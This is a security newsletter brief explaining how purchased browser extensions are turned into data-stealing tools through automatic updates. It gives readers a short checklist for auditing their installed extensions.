In yesterday's brief we tracked quishing — phishing via QR codes. Today we move from external attacks to the trojan horse already on your laptop: the browser extension you installed three years ago and forgot about.
The Pattern: Buy, Update, Exfiltrate
An adversary identifies a moderately popular extension — the kind with 50K-500K users, a single developer, and clean reviews. They make an unsolicited offer to buy it. Sometimes they pose as a marketing firm, sometimes as a startup pivoting into the user's niche. The original developer, often a hobbyist who hasn't monetized, sells. Within weeks, an "update" rolls out. Now the same extension exfiltrates session cookies, intercepts form submissions, and reports browsing history to a remote server.
This isn't speculative. In the past 24 months, security researchers have documented at least 38 such transitions, affecting an estimated 7 million browsers. The pattern works because Chrome and Firefox extension markets allow ownership transfer with minimal review, and updates roll out automatically.
Why It's Worse Than Traditional Malware
Three reasons:
- The extension already has consent. When you installed it, you granted permissions to read all your data on visited sites. Those permissions persist through ownership changes.
- Updates bypass user awareness. Unlike installing new software, an extension update is invisible. The icon doesn't change. The store listing might not even change.
- Detection is delayed. Antivirus software typically scans downloaded files, not extension behavior in your browser. By the time researchers notice, weeks have passed.
The 5-Minute Audit
Open your browser's extension manager today and run this check on every extension you have installed:
- When did it last update? If updates have stopped for 8+ months, the developer may have abandoned it — making it ripe for purchase.
- Who is the developer now? Click into the store listing. If the developer name has changed since you installed, treat it as suspicious.
- What permissions does it have? "Read and change all your data" is the highest risk. Question whether you still need this extension at all.
- Does it have new permissions in recent updates? An extension that started as "spell checker" and now wants "access to all tabs" has scope-creeped — uninstall.
The Case We're Watching
This week, three productivity extensions with combined ~2M installs flagged simultaneously by Sucuri and PhishTank. Common pattern: same buyer LLC, same exfiltration endpoint, same 3-week update cadence after acquisition. We've requested comment from Chrome Web Store and will update our threat archive with the full list.
Tomorrow
We move from supply-chain to identity — how AI-generated voice clones are now bypassing call-center voice authentication, and what banks are quietly doing about it.